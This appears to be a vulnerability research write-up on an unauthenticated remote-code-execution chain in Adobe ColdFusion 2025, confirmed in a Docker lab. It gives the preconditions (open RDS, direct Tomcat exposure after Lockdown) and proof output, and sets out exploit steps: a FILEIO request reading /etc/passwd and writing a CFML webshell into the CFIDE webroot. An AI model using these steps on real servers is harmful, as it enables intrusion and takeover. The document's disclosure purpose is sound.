# Adobe ColdFusion 2025 Lockdown + Absolute-Path FILEIO Chain

## Verdict

Confirmed in Docker for the open-RDS threat model used by the public RDS research:

- RDS is enabled.
- RDS authentication is disabled.
- No RDS password, cookie, or authenticated session is sent in exploit requests.
- Official Server Auto-Lockdown has completed successfully.
- Apache Lockdown blocks `/CFIDE`, but direct Tomcat on port 8500 remains reachable.

This is the intended chain: unauthenticated Lockdown boundary bypass via direct Tomcat exposure plus the Pruva-discovered absolute-path FILEIO bypass.

## Target

- Container: `cf2025-lockdown-candidate`
- Image: `adobecoldfusion/coldfusion2025:2025.0.10`
- Image id: `sha256:a51436584affbca07abe4909620cdd098f81737ba1e5f368410633df9474592a`
- ColdFusion build observed elsewhere in the same target family: `2025,0,10,331899`
- Lockdown evidence: `/opt/coldfusion/lockdown/cfusion/Logs/ServerLockdown_cfusion_*.log` contains `ColdFusion Server has been locked down successfully`

## Preconditions

The chain is unauthenticated only under open RDS:

```text
rds.enabled=true
rds.security.enabled=false
```

The strict default/negative-control state is different:

```text
rds.enabled=true
rds.security.enabled=true
```

Under the strict state, unauthenticated FILEIO did not reach read/write primitives. The probe matrix produced `read_success_count=0`, `rce_success_count=0`, with Tomcat RDS routes returning `-100: Unable to authenticate on RDS server...` and Apache routes returning 404.

## Runtime Proof

Proof script:

```text
/tmp/cf-lockdown-goal/prove_unauth_lockdown_abs_path_chain.sh
```

Key output:

```text
lockdown_success=1
rds.enabled'><string>true</string>
rds.security.enabled'><string>false</string>
apache_cfide_http=404 apache_cfide_blocked=1
read_http=200 read_ok=1
trav_http=200 trav_rejected=1
write_http=200 write_ok=1 shell_path=/opt/coldfusion/cfusion/wwwroot/CFIDE/pruva_unauth_lockdown_chain_1783452215.cfm
tomcat_shell_http=200 tomcat_rce_ok=1
apache_shell_http=404 apache_rce_ok=0
VERDICT=confirmed_unauth_lockdown_bypass_plus_absolute_path_rce
```

RCE marker:

```text
PRUVA_UNAUTH_LOCKDOWN_CHAIN_1783452215:uid=999(cfuser) gid=999(cfuser) groups=999(cfuser)
```

## Exploit Shape

1. Send unauthenticated RDS FILEIO to direct Tomcat:

```text
POST http://127.0.0.1:18500/CFIDE/main/ide.cfm?ACTION=FILEIO
Content-Type: application/octet-stream
```

2. Use a length-prefixed RDS body with an absolute path and no `..`:

```text
["/etc/passwd", "READ"]
```

3. Write CFML with an absolute path under the writable `CFIDE` directory:

```text
["/opt/coldfusion/cfusion/wwwroot/CFIDE/<marker>.cfm", "WRITE", "0", "<cfexecute ...>"]
```

4. Execute the CFML over direct Tomcat:

```text
GET http://127.0.0.1:18500/CFIDE/<marker>.cfm
```

Apache remains blocked for the same `/CFIDE/<marker>.cfm` path, returning HTTP 404, so the Lockdown bypass component is the exposed direct Tomcat service, not an Apache rewrite bypass.

## Boundaries

- Confirmed: unauthenticated RCE under open-RDS after Lockdown via direct Tomcat and absolute-path FILEIO.
- Confirmed negative: strict RDS authentication blocks unauthenticated FILEIO.
- Confirmed negative: `../` traversal is rejected by patched `RdsFileSecurity.resolveCanonical`.
- Not claimed: unauthenticated bypass when `rds.security.enabled=true`.
- Not claimed: Apache-fronted `/CFIDE` bypass; Apache Lockdown blocked `/CFIDE` as expected.
